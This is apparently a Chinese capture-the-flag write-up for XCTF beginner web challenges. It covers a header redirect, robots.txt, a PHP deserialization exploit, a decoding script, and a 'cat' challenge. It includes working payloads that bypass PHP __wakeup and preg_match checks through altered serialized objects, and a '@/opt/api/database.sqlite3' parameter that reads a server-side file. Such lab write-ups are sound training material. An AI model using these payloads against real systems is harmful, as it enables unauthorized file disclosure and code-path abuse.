攻防世界-web

攻防世界-web

babyphp

目录跳转

输入index.php会自动跳转到1.php

直接抓包

在头部看见flag
 

location:重定向

Training-WWW-Robots

访问robot.txt(君子协议

访问浏览器禁止访问的

拿到flag

unserialize3

根据题目提示,可以看出这是道反序列化的题

class xctf{
public $flag = '111'; 
public function __wakeup(){
exit('bad requests');
}}
?code=

补全代码,看见有一个魔术方法__wakeup,此方法会在反序列化后执行,退出并返回bad requests

 绕过__wakeup即可得flag

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

O:5:"xctf":1:{s:4:"flag";s:3:"111";} 

php unserianize

 绕过wakeup

绕过正则匹配

<?php
class Demo {
    private $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}
$a=new Demo('fl4g.php');
$b= serialize($a);
echo $b ;//O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

<?php
class Demo {
    private $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}
$var = new Demo('fl4g.php');
$var = serialize($var);
$var = str_replace('O:4', 'O:+4',$var);//绕过preg_match
$var = str_replace(':1:', ':2:',$var);//绕过wakeup
var_dump($var);//string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}"
var_dump(base64_encode($var));#显示base64编码后的序列化字符串
//string(68) "TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBo***I7fQ=="
?>

?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBo***I7fQ==

web2

解密脚本:

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$miwen=base64_decode(strrev(str_rot13($miwen)));

//echo $miwen;

$m=$miwen;

for($i=0;$i<strlen($m);$i++){
		
	$_c=substr($m,$i,1);
	$__=ord($_c)-1;    # 字符转数字,在减1
	$__=chr($__);      # 数字转字符 

    $_=$_.$__;         # 拼接字符串

	}

echo strrev($_);        # 反转字符串

cat

?url=@/opt/api/database.sqlite3 

转载请说明出处内容投诉
CSS教程_站长资源网 » 攻防世界-web

发表评论

欢迎 访客 发表评论

一个令你着迷的主题!

查看演示 官网购买